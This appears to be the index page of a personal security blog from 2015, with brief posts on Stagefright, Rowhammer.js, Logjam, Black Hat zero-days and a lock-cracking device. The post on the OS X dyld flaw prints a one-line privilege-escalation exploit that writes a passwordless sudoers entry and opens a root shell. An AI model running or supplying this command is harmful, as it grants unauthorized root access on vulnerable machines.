Jul 15 28

Full disclosure at BlackHat 2015!

stagefrightStagefright’ it gets the title of ‘Mother of all Android Vulnerabilities’, as it impacts 95% of all Android devices out there and do not require any interaction with the victim.

The cause of the problem appears to be a memory error in the processing of MPEG4 and 3GPP video files.

written by d45id \\ tags: , , , , , ,

Jul 15 25

In this paper we [Daniel Gruss, Clémentine Maurice, Stefan Mangard] present Rowhammer.js, a JavaScript-based implementation of the Rowhammer attack. Our attack uses an eviction strategy found by a generic algorithm that improves the eviction rate compared to existing eviction strategies from 95.2% to 99.99%. Rowhammer.js is the first remote software-induced hardware-fault attack. In contrast to other fault attacks it does not require physical access to the machine, or the execution of native code or access to special instructions. As JavaScript-based fault attacks can be performed on millions of users stealthily and simultaneously, we propose countermeasures that can be implemented immediately.

written by d45id \\ tags: , , ,

Jul 15 23

alertSecurity expert Stefan Esser discovered a privilege escalation vulnerability in OS X 10.10. The vulnerability is found in the dynamic linker dyld.

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

OS X 10.11 pre release candidate is not vulnerable. For all the people who want to fix the problem as soon as possible a patch was published by Esser.

written by d45id \\ tags: , , , , , , , ,

Jul 15 21

…a very interesting article published in wired magazine about wireless carjacking.

written by d45id \\ tags: , , , ,

Jul 15 18

At Black Hat USA security conference 2015 will be presented more than 30 Zero-Day flaws.

“We have 32 different zero-day vulnerabilities that will be disclosed at the event,” Wylie said. “The zero-days come from a broad swath of topics, including mobile and SCADA [supervisory control and data acquisition] systems.”

I am very curious already.

written by d45id \\ tags: , , ,

Jul 15 10

I’ve seen an very interesting LEGO construction at Hannover IdeenExpo. A near full automated paper cube production machine.

written by d45id \\ tags: , , , , , , , ,

Mai 15 20

alertCrypto researcher discovered a new ancient bug in Diffie-Hellman crytography. The problem is thatservers that support 512-key “export-grade” Diffie-Hellman (DH) can be forced to downgrade a connection to that weak level. The server – and therefore the client – will both still believe they’re using stronger keys such as 768-bit or 1024-bit.

Matthew Green – one of the researcher – has hosted a site discussing what’s being called “#Logjam“, Weakdh.org, with a detailed paper – Imperfect Forward Secrecy: How Diffie-Hellman Fails in Practice (PDF) – that explain the bug in a academic way.

written by d45id \\ tags: , , , , , , , ,

Mai 15 14

Combo Breaker is a motorized, battery powered, 3D printed, Arduino-based combination lock cracking device.

Source code / 3D models:https://github.com/samyk/combobreaker

 

written by d45id \\ tags: , , , , ,